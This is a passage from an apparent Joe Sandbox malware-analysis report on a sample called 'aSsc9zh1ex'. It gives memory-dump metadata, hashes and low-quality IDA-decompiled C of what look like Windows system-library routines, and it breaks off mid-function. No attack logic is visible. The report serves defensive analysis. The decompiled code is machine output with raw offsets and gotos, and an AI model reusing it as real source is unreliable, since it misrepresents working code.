                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7afe41
                                                                                                                              0x1d7afe41
                                                                                                                              0x1d7afe42
                                                                                                                              0x1d7afe48
                                                                                                                              0x1d7afe51
                                                                                                                              0x00000000
                                                                                                                              0x1d7afe51
                                                                                                                              0x1d76f0d4
                                                                                                                              0x1d76f0db
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f0e1
                                                                                                                              0x1d76f0e5
                                                                                                                              0x1d76f193
                                                                                                                              0x1d76f199
                                                                                                                              0x1d76f19b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f0f4
                                                                                                                              0x1d76f0f4
                                                                                                                              0x1d76f0f8
                                                                                                                              0x1d76f0fa
                                                                                                                              0x1d76f0fd
                                                                                                                              0x1d7afe1e
                                                                                                                              0x1d7afe21
                                                                                                                              0x1d7afe24
                                                                                                                              0x1d7afe27
                                                                                                                              0x1d7afe2a
                                                                                                                              0x1d7afe2d
                                                                                                                              0x1d7afe2d
                                                                                                                              0x1d76f0fd
                                                                                                                              0x00000000
                                                                                                                              0x1d76f0f8
                                                                                                                              0x1d76f0eb
                                                                                                                              0x1d76f0ee
                                                                                                                              0x1d76f0f1
                                                                                                                              0x00000000
                                                                                                                              0x1d76f0f1
                                                                                                                              0x1d76f01c
                                                                                                                              0x1d76f01f
                                                                                                                              0x1d76f02a
                                                                                                                              0x1d76f02d
                                                                                                                              0x1d76f030
                                                                                                                              0x1d76f034
                                                                                                                              0x1d76f036
                                                                                                                              0x1d76f039
                                                                                                                              0x1d76f045
                                                                                                                              0x1d76f051
                                                                                                                              0x1d76f05a
                                                                                                                              0x1d76f05a
                                                                                                                              0x1d76f05d
                                                                                                                              0x1d76f060
                                                                                                                              0x1d76f062
                                                                                                                              0x1d7afd59
                                                                                                                              0x1d7afd5c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7afd62
                                                                                                                              0x1d7afd66
                                                                                                                              0x1d7afd72
                                                                                                                              0x1d7afd84
                                                                                                                              0x1d7afd8a
                                                                                                                              0x1d7afd8d
                                                                                                                              0x1d7afd90
                                                                                                                              0x00000000
                                                                                                                              0x1d7afd90
                                                                                                                              0x1d7afd68
                                                                                                                              0x1d7afd6c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f068
                                                                                                                              0x1d76f068
                                                                                                                              0x1d76f068
                                                                                                                              0x1d76f06d
                                                                                                                              0x1d7afd98
                                                                                                                              0x1d7afda8
                                                                                                                              0x1d7afdae
                                                                                                                              0x1d7afdae
                                                                                                                              0x1d76f073
                                                                                                                              0x1d76f078
                                                                                                                              0x1d76f07a
                                                                                                                              0x1d7afdbf
                                                                                                                              0x1d76f080
                                                                                                                              0x1d76f080
                                                                                                                              0x1d76f080
                                                                                                                              0x1d76f085
                                                                                                                              0x1d76f088
                                                                                                                              0x1d7afde1
                                                                                                                              0x1d7afde4
                                                                                                                              0x1d7afde4
                                                                                                                              0x1d76f08e
                                                                                                                              0x1d76f095
                                                                                                                              0x1d76f09d
                                                                                                                              0x00000000
                                                                                                                              0x1d76f09d
                                                                                                                              0x1d76f062
                                                                                                                              0x1d7afd29
                                                                                                                              0x1d76f150
                                                                                                                              0x1d76f153
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f155
                                                                                                                              0x1d76ef87
                                                                                                                              0x1d76ef8a
                                                                                                                              0x1d76f136
                                                                                                                              0x1d76f13c
                                                                                                                              0x1d76f13e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d76f13e
                                                                                                                              0x00000000
                                                                                                                              0x1d76ef8a

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2444ccb01ba7fefd59d24ac30d005a308903c07edd29d5ce32563027418fed39
                                                                                                                              • Instruction ID: 4430665e11737e13c0751fc3186e18360b26914dd56efc4596adf6a6c3e084a7
                                                                                                                              • Opcode Fuzzy Hash: 2444ccb01ba7fefd59d24ac30d005a308903c07edd29d5ce32563027418fed39
                                                                                                                              • Instruction Fuzzy Hash: 83E12775D04608DFDB25CFA9D984A9DFBF1FF48320F54892AE945A7261E730A841CF22
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7BEBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 21%
                                                                                                                              			E1D7BEBD0(void* __ebx, intOrPtr __ecx, signed char __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t84;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr _t94;
				intOrPtr _t95;
				short* _t115;
				intOrPtr* _t118;
				intOrPtr _t125;
				intOrPtr _t127;
				signed char _t128;
				intOrPtr _t132;
				intOrPtr _t135;
				intOrPtr* _t136;
				intOrPtr _t139;
				void* _t141;

				_t128 = __edx;
				_push(0x58);
				_push(0x1d81cc00);
				E1D797BE4(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t141 - 0x40)) = __edx;
				_t135 = __ecx;
				 *((intOrPtr*)(_t141 - 0x20)) = __ecx;
				_t118 = 2;
				 *((intOrPtr*)(_t141 - 0x28)) = _t118;
				 *(_t141 - 0x68) =  *(_t141 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t141 - 0x64)) = 0x1d7bf550;
				 *((intOrPtr*)(_t141 - 0x60)) = E1D7BF5D0;
				if( *((intOrPtr*)(_t141 + 0xc)) >= _t118) {
					_t115 =  *((intOrPtr*)(_t141 + 8));
					 *_t115 = 0;
					_t132 = 0;
				} else {
					_t132 = 0xc0000004;
					_t115 = 0;
				}
				 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
				 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
				if(_t135 == 0 || (_t128 & 0x00000002) != 0) {
					_t135 = _t141 - 0x68;
					 *((intOrPtr*)(_t141 - 0x20)) = _t135;
				}
				 *((intOrPtr*)(_t141 - 0x4c)) = _t135;
				_t84 = 0;
				_t136 =  *((intOrPtr*)(_t141 + 0x10));
				while(1) {
					 *(_t141 - 0x2c) = _t84;
					if(_t84 >= 1) {
						break;
					}
					 *((intOrPtr*)(_t141 - 0x44)) = 0x2800;
					 *(_t141 - 0x34) = 1;
					if(_t136 != 0) {
						 *_t136 = _t118;
					}
					if((_t128 & 0x00000002) != 0) {
						_t23 = 0x1d7118a4 + _t84 * 0x14; // 0x1d7beaf0
						 *0x1d8391e0();
						 *((intOrPtr*)( *_t23))();
						_t84 =  *(_t141 - 0x2c);
					}
					 *(_t141 - 4) =  *(_t141 - 4) & 0x00000000;
					_t86 = _t84 * 0x14;
					 *(_t141 - 0x38) = _t86;
					_t31 = _t86 + 0x1d711898; // 0x1d7be9f0
					_t136 =  *_t31;
					_t118 = _t136;
					 *0x1d8391e0( *((intOrPtr*)(_t141 - 0x20)), _t141 - 0x30, _t141 - 0x50);
					_t88 =  *_t136();
					if(_t88 < 0) {
						L31:
						_t132 = _t88;
						goto L32;
					} else {
						if( *((intOrPtr*)(_t141 - 0x30)) != 0) {
							_push(_t141 - 0x24);
							_push( *((intOrPtr*)(_t141 - 0x30)));
							_push( *((intOrPtr*)(_t141 - 0x20)));
							_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d71189c));
							while(1) {
								_t118 = _t136;
								 *0x1d8391e0();
								_t88 =  *_t136();
								if(_t88 < 0) {
									goto L31;
								}
								if( *((intOrPtr*)(_t141 - 0x24)) !=  *((intOrPtr*)(_t141 - 0x30))) {
									_t94 =  *((intOrPtr*)(_t141 - 0x44));
									if(_t94 != 0) {
										_t95 = _t94 - 1;
										 *((intOrPtr*)(_t141 - 0x44)) = _t95;
										 *((intOrPtr*)(_t141 - 0x5c)) = _t95;
										_t125 =  *((intOrPtr*)(_t141 - 0x28)) +  *(_t141 - 0x34) * 0x12c;
										 *((intOrPtr*)(_t141 - 0x28)) = _t125;
										 *(_t141 - 0x34) = 1;
										 *((intOrPtr*)(_t141 - 0x58)) = 1;
										if( *((intOrPtr*)(_t141 + 0xc)) >= _t125) {
											 *_t115 = 0x12c;
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d7118a0));
											_t118 = _t136;
											 *0x1d8391e0( *((intOrPtr*)(_t141 - 0x20)), _t115 + 4,  *((intOrPtr*)(_t141 - 0x24)),  *((intOrPtr*)(_t141 - 0x50)),  *((intOrPtr*)(_t141 - 0x40)));
											_t88 =  *_t136();
											if(_t88 < 0) {
												goto L31;
											} else {
												_t128 =  *(_t115 + 0xc);
												if(_t128 == 0) {
													 *(_t141 - 0x34) = 0;
													 *((intOrPtr*)(_t141 - 0x58)) = 0;
													goto L28;
												} else {
													_t128 = _t128 + 0x3c;
													_t136 =  *((intOrPtr*)(_t141 - 0x20));
													_t118 = _t136;
													_t88 = E1D7BF5EC(_t118, _t128, _t141 - 0x54, 4);
													if(_t88 < 0) {
														goto L31;
													} else {
														_t127 =  *(_t115 + 0xc) +  *((intOrPtr*)(_t141 - 0x54));
														 *((intOrPtr*)(_t141 - 0x48)) = _t127;
														_t128 = _t127 + 8;
														_t118 = _t136;
														_t88 = E1D7BF5EC(_t118, _t128, _t115 + 0x124, 4);
														if(_t88 < 0) {
															goto L31;
														} else {
															_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x58;
															_t118 = _t136;
															_t88 = E1D7BF5EC(_t118, _t128, _t115 + 0x120, 4);
															if(_t88 < 0) {
																goto L31;
															} else {
																_t128 =  *((intOrPtr*)(_t141 - 0x48)) + 0x34;
																_t118 = _t136;
																_t88 = E1D7BF5EC(_t118, _t128, _t115 + 0x128, 4);
																if(_t88 < 0) {
																	goto L31;
																} else {
																	_t115 = _t115 + 0x12c;
																	 *((intOrPtr*)(_t141 - 0x3c)) = _t115;
																	 *_t115 = 0;
																	goto L29;
																}
															}
														}
													}
												}
											}
										} else {
											_t132 = 0xc0000004;
											 *((intOrPtr*)(_t141 - 0x1c)) = 0xc0000004;
											L28:
											_t139 =  *((intOrPtr*)(_t141 - 0x20));
											L29:
											_push(_t141 - 0x24);
											_push( *((intOrPtr*)(_t141 - 0x24)));
											_push(_t139);
											_t136 =  *((intOrPtr*)( *(_t141 - 0x38) + 0x1d71189c));
											continue;
										}
									} else {
										_t132 = 0xc0000229;
										L32:
										 *((intOrPtr*)(_t141 - 0x1c)) = _t132;
									}
								}
								goto L33;
							}
							goto L31;
						}
					}
					L33:
					 *(_t141 - 4) = 0xfffffffe;
					E1D7BEE16();
					_t84 =  *(_t141 - 0x2c) + 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t141 - 0x10));
				return _t132;
			}


















                                                                                                                              0x1d7bebd0
                                                                                                                              0x1d7bebd0
                                                                                                                              0x1d7bebd2
                                                                                                                              0x1d7bebd7
                                                                                                                              0x1d7bebdc
                                                                                                                              0x1d7bebdf
                                                                                                                              0x1d7bebe1
                                                                                                                              0x1d7bebe6
                                                                                                                              0x1d7bebe7
                                                                                                                              0x1d7bebea
                                                                                                                              0x1d7bebee
                                                                                                                              0x1d7bebf5
                                                                                                                              0x1d7bebff
                                                                                                                              0x1d7bec0a
                                                                                                                              0x1d7bec0f
                                                                                                                              0x1d7bec12
                                                                                                                              0x1d7bec01
                                                                                                                              0x1d7bec01
                                                                                                                              0x1d7bec06
                                                                                                                              0x1d7bec06
                                                                                                                              0x1d7bec14
                                                                                                                              0x1d7bec17
                                                                                                                              0x1d7bec1c
                                                                                                                              0x1d7bec23
                                                                                                                              0x1d7bec26
                                                                                                                              0x1d7bec26
                                                                                                                              0x1d7bec29
                                                                                                                              0x1d7bec2c
                                                                                                                              0x1d7bec2e
                                                                                                                              0x1d7bec31
                                                                                                                              0x1d7bec31
                                                                                                                              0x1d7bec37
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7bec3d
                                                                                                                              0x1d7bec44
                                                                                                                              0x1d7bec4d
                                                                                                                              0x1d7bec4f
                                                                                                                              0x1d7bec4f
                                                                                                                              0x1d7bec54
                                                                                                                              0x1d7bec59
                                                                                                                              0x1d7bec61
                                                                                                                              0x1d7bec67
                                                                                                                              0x1d7bec69
                                                                                                                              0x1d7bec69
                                                                                                                              0x1d7bec6c
                                                                                                                              0x1d7bec70
                                                                                                                              0x1d7bec73
                                                                                                                              0x1d7bec81
                                                                                                                              0x1d7bec81
                                                                                                                              0x1d7bec87
                                                                                                                              0x1d7bec89
                                                                                                                              0x1d7bec8f
                                                                                                                              0x1d7bec93
                                                                                                                              0x1d7bedf0
                                                                                                                              0x1d7bedf0
                                                                                                                              0x00000000
                                                                                                                              0x1d7bec99
                                                                                                                              0x1d7bec9d
                                                                                                                              0x1d7beca6
                                                                                                                              0x1d7beca7
                                                                                                                              0x1d7becaa
                                                                                                                              0x1d7becb0
                                                                                                                              0x1d7bedde
                                                                                                                              0x1d7bedde
                                                                                                                              0x1d7bede0
                                                                                                                              0x1d7bede6
                                                                                                                              0x1d7bedea
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7becc1
                                                                                                                              0x1d7becc7
                                                                                                                              0x1d7beccc
                                                                                                                              0x1d7becd8
                                                                                                                              0x1d7becd9
                                                                                                                              0x1d7becdc
                                                                                                                              0x1d7bece9
                                                                                                                              0x1d7beceb
                                                                                                                              0x1d7becf1
                                                                                                                              0x1d7becf4
                                                                                                                              0x1d7becfa
                                                                                                                              0x1d7bed0e
                                                                                                                              0x1d7bed24
                                                                                                                              0x1d7bed2a
                                                                                                                              0x1d7bed2c
                                                                                                                              0x1d7bed32
                                                                                                                              0x1d7bed36
                                                                                                                              0x00000000
                                                                                                                              0x1d7bed3c
                                                                                                                              0x1d7bed3c
                                                                                                                              0x1d7bed41
                                                                                                                              0x1d7bedc4
                                                                                                                              0x1d7bedc7
                                                                                                                              0x00000000
                                                                                                                              0x1d7bed43
                                                                                                                              0x1d7bed49
                                                                                                                              0x1d7bed4c
                                                                                                                              0x1d7bed4f
                                                                                                                              0x1d7bed51
                                                                                                                              0x1d7bed58
                                                                                                                              0x00000000
                                                                                                                              0x1d7bed5e
                                                                                                                              0x1d7bed61
                                                                                                                              0x1d7bed64
                                                                                                                              0x1d7bed70
                                                                                                                              0x1d7bed73
                                                                                                                              0x1d7bed75
                                                                                                                              0x1d7bed7c
                                                                                                                              0x00000000
                                                                                                                              0x1d7bed7e
                                                                                                                              0x1d7bed8a
                                                                                                                              0x1d7bed8d
                                                                                                                              0x1d7bed8f
                                                                                                                              0x1d7bed96
                                                                                                                              0x00000000
                                                                                                                              0x1d7bed98
                                                                                                                              0x1d7beda4
                                                                                                                              0x1d7beda7
                                                                                                                              0x1d7beda9
                                                                                                                              0x1d7bedb0
                                                                                                                              0x00000000
                                                                                                                              0x1d7bedb2
                                                                                                                              0x1d7bedb2
                                                                                                                              0x1d7bedb8
                                                                                                                              0x1d7bedbd
                                                                                                                              0x00000000
                                                                                                                              0x1d7bedbd
                                                                                                                              0x1d7bedb0
                                                                                                                              0x1d7bed96
                                                                                                                              0x1d7bed7c
                                                                                                                              0x1d7bed58
                                                                                                                              0x1d7bed41
                                                                                                                              0x1d7becfc
                                                                                                                              0x1d7becfc
                                                                                                                              0x1d7bed01
                                                                                                                              0x1d7bedca
                                                                                                                              0x1d7bedca
                                                                                                                              0x1d7bedcd
                                                                                                                              0x1d7bedd0
                                                                                                                              0x1d7bedd1
                                                                                                                              0x1d7bedd4
                                                                                                                              0x1d7bedd8
                                                                                                                              0x00000000
                                                                                                                              0x1d7bedd8
                                                                                                                              0x1d7becce
                                                                                                                              0x1d7becce
                                                                                                                              0x1d7bedf2
                                                                                                                              0x1d7bedf2
                                                                                                                              0x1d7bedf2
                                                                                                                              0x1d7beccc
                                                                                                                              0x00000000
                                                                                                                              0x1d7becc1
                                                                                                                              0x00000000
                                                                                                                              0x1d7bedde
                                                                                                                              0x1d7bec9d
                                                                                                                              0x1d7bedf5
                                                                                                                              0x1d7bedf5
                                                                                                                              0x1d7bedfc
                                                                                                                              0x1d7bee04
                                                                                                                              0x1d7bee04
                                                                                                                              0x1d7bee47
                                                                                                                              0x1d7bee53

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 947de228c9b08dae0b2ec1579e1bec7d3add2f1211569fa400e4702a5df4f03e
                                                                                                                              • Instruction ID: fef9fc04747b49744b253ee2a7ba2b4599e2cb929e11d6a4d75446ff863efa81
                                                                                                                              • Opcode Fuzzy Hash: 947de228c9b08dae0b2ec1579e1bec7d3add2f1211569fa400e4702a5df4f03e
                                                                                                                              • Instruction Fuzzy Hash: 90715575E002299FDF05CFA8D884BEDBBB5BF48320F05882AD905EB354D775A901CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D81A04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 60540f54f7d839b0cb9e7eb849c76de7dd0268ffb7859446ca33c22825983c3c
                                                                                                                              • Instruction ID: 1e0d78240cf864868bea740cf6236b9f7a8f74c98ccf38dbf9052ec9490c1768
                                                                                                                              • Opcode Fuzzy Hash: 60540f54f7d839b0cb9e7eb849c76de7dd0268ffb7859446ca33c22825983c3c
                                                                                                                              • Instruction Fuzzy Hash: C9515A35B00616DFDB09CF58C890A2AB7E1FB89750B11416DE90ADB721DB75EC4ACB82
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7BEE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3446177414-0
                                                                                                                              • Opcode ID: 38e433cb6286ebaba173fd390837bfa123fc5e1a376409a7ac7e5ea46bc850c2
                                                                                                                              • Instruction ID: 3b0f96a58cf617478de06ddd35e7d41137f48668b5926ea91008b348bfbb098e
                                                                                                                              • Opcode Fuzzy Hash: 38e433cb6286ebaba173fd390837bfa123fc5e1a376409a7ac7e5ea46bc850c2
                                                                                                                              • Instruction Fuzzy Hash: FC511376E002189FDF08CF98D884ADDBBB1BF48360F15812AE805BB390D736A901CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D777A4F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 29%
                                                                                                                              			E1D777A4F(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t34;
				signed int _t35;
				signed int _t40;
				intOrPtr _t42;
				void* _t50;
				intOrPtr* _t55;
				intOrPtr* _t69;
				void* _t73;

				_t63 = __edx;
				_t51 = __ebx;
				_push(0x30);
				_push(0x1d81c840);
				E1D797BE4(__ebx, __edi, __esi);
				_t66 = __ecx;
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t69 =  *0x1d835a7c;
				_push(__edx);
				if(_t69 == 0) {
					 *0x1d8391e0();
					E1D77B490(__ecx, __edx,  *__ecx());
					_t55 =  *((intOrPtr*)(_t73 - 0x14));
					 *((intOrPtr*)(_t73 - 0x40)) =  *((intOrPtr*)( *_t55));
					 *((intOrPtr*)(_t73 - 0x24)) = _t55;
					_t34 =  *0x1d835d38; // 0xf7088b53
					 *(_t73 - 0x30) = _t34;
					__eflags =  *0x1d8365fc; // 0x61840711
					if(__eflags == 0) {
						_push(0);
						_push(4);
						_push(_t73 - 0x2c);
						_push(0x24);
						_push(0xffffffff);
						 *(_t73 - 0x1c) = E1D782B20();
						__eflags =  *(_t73 - 0x1c);
						if( *(_t73 - 0x1c) < 0) {
							E1D798AA0(_t55, _t63,  *(_t73 - 0x1c));
						}
						 *0x1d8365fc =  *(_t73 - 0x2c);
					}
					_t35 =  *0x1d8365fc; // 0x61840711
					 *(_t73 - 0x20) = _t35;
					_push(0x20);
					asm("ror eax, cl");
					 *(_t73 - 0x34) =  *(_t73 - 0x30);
					_t40 =  *(_t73 - 0x34) ^  *(_t73 - 0x20);
					__eflags = _t40;
					 *(_t73 - 0x38) = _t40;
					if(__eflags == 0) {
						 *((intOrPtr*)(_t73 - 0x3c)) = E1D7F8890(_t51, _t63, _t66, 0, __eflags,  *((intOrPtr*)(_t73 - 0x24)), 0x1d7150b4);
						_t42 =  *((intOrPtr*)(_t73 - 0x3c));
					} else {
						 *0x1d8391e0( *((intOrPtr*)(_t73 - 0x24)));
						_t42 =  *( *(_t73 - 0x38))();
					}
					 *((intOrPtr*)(_t73 - 0x28)) = _t42;
					return  *((intOrPtr*)(_t73 - 0x28));
				} else {
					 *0x1d8391e0();
					_t50 =  *_t69();
					 *(_t73 - 4) = 0xfffffffe;
					 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0x10));
					return _t50;
				}
			}











                                                                                                                              0x1d777a4f
                                                                                                                              0x1d777a4f
                                                                                                                              0x1d777a4f
                                                                                                                              0x1d777a51
                                                                                                                              0x1d777a56
                                                                                                                              0x1d777a5b
                                                                                                                              0x1d777a5d
                                                                                                                              0x1d777a61
                                                                                                                              0x1d777a67
                                                                                                                              0x1d777a6a
                                                                                                                              0x1d7b47f8
                                                                                                                              0x1d7b4801
                                                                                                                              0x1d7b4806
                                                                                                                              0x1d7b480d
                                                                                                                              0x1d7b4810
                                                                                                                              0x1d7b4813
                                                                                                                              0x1d7b4818
                                                                                                                              0x1d7b481d
                                                                                                                              0x1d7b4823
                                                                                                                              0x1d7b4825
                                                                                                                              0x1d7b4826
                                                                                                                              0x1d7b482b
                                                                                                                              0x1d7b482c
                                                                                                                              0x1d7b482e
                                                                                                                              0x1d7b4835
                                                                                                                              0x1d7b4838
                                                                                                                              0x1d7b483b
                                                                                                                              0x1d7b4840
                                                                                                                              0x1d7b4840
                                                                                                                              0x1d7b4848
                                                                                                                              0x1d7b4848
                                                                                                                              0x1d7b484d
                                                                                                                              0x1d7b4852
                                                                                                                              0x1d7b485b
                                                                                                                              0x1d7b4863
                                                                                                                              0x1d7b4865
                                                                                                                              0x1d7b486b
                                                                                                                              0x1d7b486b
                                                                                                                              0x1d7b486e
                                                                                                                              0x1d7b4871
                                                                                                                              0x1d7b4892
                                                                                                                              0x1d7b4895
                                                                                                                              0x1d7b4873
                                                                                                                              0x1d7b487b
                                                                                                                              0x1d7b4881
                                                                                                                              0x1d7b4881
                                                                                                                              0x1d7b4898
                                                                                                                              0x1d7b489e
                                                                                                                              0x1d777a70
                                                                                                                              0x1d777a72
                                                                                                                              0x1d777a7c
                                                                                                                              0x1d7b48ac
                                                                                                                              0x1d7b48b6
                                                                                                                              0x1d7b48c2
                                                                                                                              0x1d7b48c2

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4281723722-0
                                                                                                                              • Opcode ID: 74a0c9823db1af18b4881298e56ce3f15415f1d11d2845bc9e16245d595ad4d2
                                                                                                                              • Instruction ID: 2bf8a9a12a23382c2b3d33a54aac9b06bce0f3c71558709d4fcd4fa7b885e487
                                                                                                                              • Opcode Fuzzy Hash: 74a0c9823db1af18b4881298e56ce3f15415f1d11d2845bc9e16245d595ad4d2
                                                                                                                              • Instruction Fuzzy Hash: 47310379E00668EFCF05DFA8D888A9DBBB1AB4C724F10452AE515B7291D734A900CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D774B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 50%
                                                                                                                              			E1D774B79(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed int _t86;
				signed int _t89;
				intOrPtr* _t97;
				signed int _t99;
				void* _t102;
				void* _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t113;
				signed int _t114;
				void* _t115;

				_t107 = __edx;
				_t72 =  *0x1d83b370 ^ _t114;
				_v8 =  *0x1d83b370 ^ _t114;
				_t110 = __ecx;
				_v96 = __edx;
				_t99 = __edx;
				if(__edx == 0 || ( *(__edx + 8) & 0x00000004) != 0) {
					L12:
					return E1D784B50(_t72, _t97, _v8 ^ _t114, _t107, _t110, _t111);
				} else {
					_t110 = __ecx + 4;
					_t97 =  *_t110;
					while(_t97 != _t110) {
						_t6 = _t97 - 8; // -4
						_t111 = _t6;
						_t107 = 1;
						if( *_t111 != 0x74736c46) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = 1;
							_v68 = 1;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = 1;
							E1D798A60(_t99, 1);
							_t99 = _v96;
							_t107 = 1;
						}
						if( *(_t111 + 0x14) !=  !( *(_t111 + 4))) {
							_v84 = _v84 & 0x00000000;
							_push( &_v92);
							_v76 = 4;
							_v72 = _t107;
							_v68 = 2;
							_v64 = _t110;
							_v60 = _t111;
							_v92 = 0xc0150015;
							_v88 = _t107;
							E1D798A60(_t99, _t107);
							_t99 = _v96;
						}
						_t9 = _t111 + 0x18; // 0x1c
						_t72 = _t9;
						if(_t99 < _t9) {
							L13:
							_t97 =  *_t97;
							continue;
						} else {
							_t10 = _t111 + 0x618; // 0x614
							_t72 = _t10;
							if(_t99 >= _t10) {
								goto L13;
							} else {
								_v96 = 0x30;
								_t82 = _t99 - _t111 - 0x18;
								asm("cdq");
								_t107 = _t82 % _v96;
								_t72 = 0x18 + _t82 / _v96 * 0x30 + _t111;
								if(_t99 == 0x18 + _t82 / _v96 * 0x30 + _t111) {
									_t72 =  *(_t111 + 4);
									if(_t72 != 0) {
										_t86 = _t72 - 1;
										 *(_t111 + 4) = _t86;
										_t72 =  !_t86;
										 *(_t111 + 0x14) =  !_t86;
										 *((intOrPtr*)(_t99 + 8)) = 4;
										if( *(_t111 + 4) == 0) {
											_t72 =  *(_t97 + 4);
											if(_t72 != _t110) {
												do {
